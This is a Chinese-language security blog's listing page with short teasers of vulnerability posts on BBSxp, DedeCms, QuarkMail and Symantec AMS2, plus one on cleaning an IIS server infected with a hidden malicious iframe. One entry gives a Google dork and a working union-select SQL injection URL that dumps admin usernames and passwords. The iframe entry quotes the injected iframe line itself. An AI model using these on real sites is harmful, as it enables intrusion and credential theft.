预览模式: 普通 | 列表

BBSxp2008 8.0.4 Sql注入漏洞

影响版本:BBSxp 2008 (Build: 8.0.4)
漏洞文件:MoveThread.asp
MoveThread.asp行2-24
#----代码阅读----#

查看更多...

Tags: BBSxp

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 10

dedecms5.1爆出注入漏洞

dedecms5.1爆出注入漏洞(极有可能全部版本适用)
漏洞关联文件:member_guestbook_action.php
源码解析:

$title = cn_substr(html2text($title),60);

查看更多...

Tags: dedecms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 10

DedeCms v5.5 0day

漏洞文件:digg_ajax.php
#DedeCms v5.5 0day#
<?php
print_r(''
+----------------------------------------+

查看更多...

Tags: dedecms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 13

Dedecms V5.5 Final 远程代码执行漏洞

代码下载地址: http://www.dedecms.com/upimg/sof ... 55-GBK-Final.tar.gz

这个漏洞是上次那个代码执行漏洞的再次利用

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 9

毕节热线企业建站系统漏洞 0day

1.google
inurl:friendlink.asp 网站介绍:E_mail:
exp:
productview.asp?id=8%20union%20select%201,admin,3,4,5,6,7,password,9,10,11,12%20from%20admin
爆出管理用户名 密码

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 9

快客电邮(QuarkMail)最新远程漏洞

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案(该产品的主要客户名单http://www.ipmotor.com/cases/cases.html), 其webmail部分使用perl cgi编写,近日笔者在渗透测试过程当中发现一处严重的安全漏洞,导致远程用户可以在邮件系统上以当前web权限身份下载任意文件,获取敏感配置文件(如 系统口令文件/数据库密码)从而进一步渗透主机或者系统。
影响范围:<=quarkmail server   version 1.2.1(本稿截止为最新版)
厂商网址:http://www.ipmotor.com/
漏洞解析:用户传入的 参数没有做有效的过滤,从而导致产生了目录遍历漏洞。

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 7

处理WIN2003服务器IIS被挂马全过程

By  wuchaochao

一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 9
#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote #command-execution vulnerability because the software fails to adequately sanitize user-supplied #input.
#Successfully exploiting this issue will allow an attacker to execute arbitrary commands with #SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will #result in a denial-of-service condition.
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2